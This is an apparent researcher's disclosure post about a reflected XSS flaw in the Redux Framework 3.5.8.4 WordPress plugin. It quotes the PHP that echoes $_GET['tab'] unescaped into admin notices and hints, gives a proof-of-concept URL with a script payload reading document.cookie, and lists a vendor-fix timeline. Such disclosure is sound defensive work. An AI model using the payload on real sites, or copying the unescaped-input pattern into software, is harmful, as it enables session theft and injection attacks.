Kacper SzurekTagsPolishNewsletterAbout
YouTubeWebinaryFacebookTwitter
Kacper Szurek
TagsPolishNewsletterAboutYouTubeWebinaryFacebookTwitter
Redux Framework 3.5.8.4 Reflected XSS

09-05-2016 / Vulnerabilities

Redux Framework 3.5.8.4 Reflected XSS

$_GET['tab'] is not escaped.

File: redux-framework\ReduxCore\inc\class.redux_admin_notices.php

$pageName = '';
$curTab   = '';
if ( $pagenow == 'admin.php' || $pagenow == 'themes.php' ) {
    // Get the current page.  To avoid errors, we'll set
    // the redux page slug if the GET is empty.
    $pageName = empty( $_GET['page'] ) ? '&page=' . self::$_parent->args['page_slug'] : '&page=' . $_GET['page'];
    // Ditto for the current tab.
    $curTab = empty( $_GET['tab'] ) ? '&tab=0' : '&tab=' . $_GET['tab'];
}
global $wp_version;
// Print the notice with the dismiss link
if ( version_compare( $wp_version, '4.2', '>' ) ) {
    $output    = "";
    $css_id    = $notice['id'] . $pageName . $curTab;
    $css_class = $notice['type'] . 'redux-notice notice is-dismissible redux-notice';
    $output .= "<div {$add_style} id='$css_id' class='$css_class'> \n";
    $nonce = wp_create_nonce( $notice['id'] . $pageName . $curTab . 'nonce' );
    $output .= "<input type='hidden' class='dismiss_data' id='" . $notice['id'] . $pageName . $curTab . "' value='{$nonce}'> \n";
    $output .= "<p>{$notice['msg']}</p>";
    $output .= "</div> \n";
    echo $output;
} else {
    echo '<div ' . $add_style . ' class="' . $notice['type'] . ' notice is-dismissable"><p>' . $notice['msg'] . '&nbsp;&nbsp;<a href="?dismiss=true&amp;id=' . $notice['id'] . $pageName . $curTab . '">' . __( 'Dismiss', 'redux-framework' ) . '</a>.</p></div>';
}

So if user has at least one not dismissed notice, we have reflected XSS.

Similar bug exists inside hints.

$curTab = '0';
if ( isset ( $_GET['tab'] ) ) {
    $curTab = $_GET['tab'];
}
// Default url values for enabling hints.
$dismiss = 'true';
$s       = __( 'Enable', 'redux-framework' );
// Values for disabling hints.
if ( 'true' == $hint_status ) {
    $dismiss = 'false';
    $s       = __( 'Disable', 'redux-framework' );
}
// Make URL
$url = '<a class="redux_hint_status" href="?dismiss=' . $dismiss . '&amp;id=hints&amp;page=' . $curPage . '&amp;tab=' . $curTab . '">' . $s . ' hints</a>';

Proof of Concept

http://wp/wp-admin/themes.php?tab=\'><script>alert(document.cookie);</script>

Timeline

  • 26-10-2015: Discovered
  • 26-10-2015: Vendor notified
  • 29-10-2015: Version 3.5.8.7 released, issue resolved